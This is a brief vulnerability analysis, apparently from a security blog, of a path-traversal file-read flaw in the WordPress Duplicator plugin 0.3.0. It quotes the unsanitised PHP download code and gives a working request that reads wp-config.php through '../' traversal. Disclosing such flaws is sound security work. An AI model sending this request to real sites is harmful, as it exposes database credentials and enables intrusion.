Analysis of vulnerability
In version 0.3.0 of WordPress duplicator the file /files/installer.rescue.php and /files/installer.template.php which were added for security reasons. The file was made to download an installer file. They both start with this snippet of code::
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
//DOWNLOAD ONLY: if ( isset($_GET['get'])) { $file = $_GET['file']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=installer.php'); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); @flush(); if (@readfile($file) == false) { $data = file_get_contents($file); if ($data == false) { die("Unable to read installer file. The server currently has readfile and file_get_contents disabled on this server. Please contact your server admin to remove this restriction"); } else { print $data; } } exit; } } |
If the “get” querystring parameter is set, it will read the file specified by the “file” querystring parameter and read that into the response as installer.php. But because this file is deployed by default to all installations and it does not sanitize the “file” variable, we can use it to read any arbitrary file by making a request like this:
|
1 |
http://192.168.80.130/wordpress/wp-content/plugins/duplicator/files/installer.rescue.php?get=&file=../../../../wp-config.php |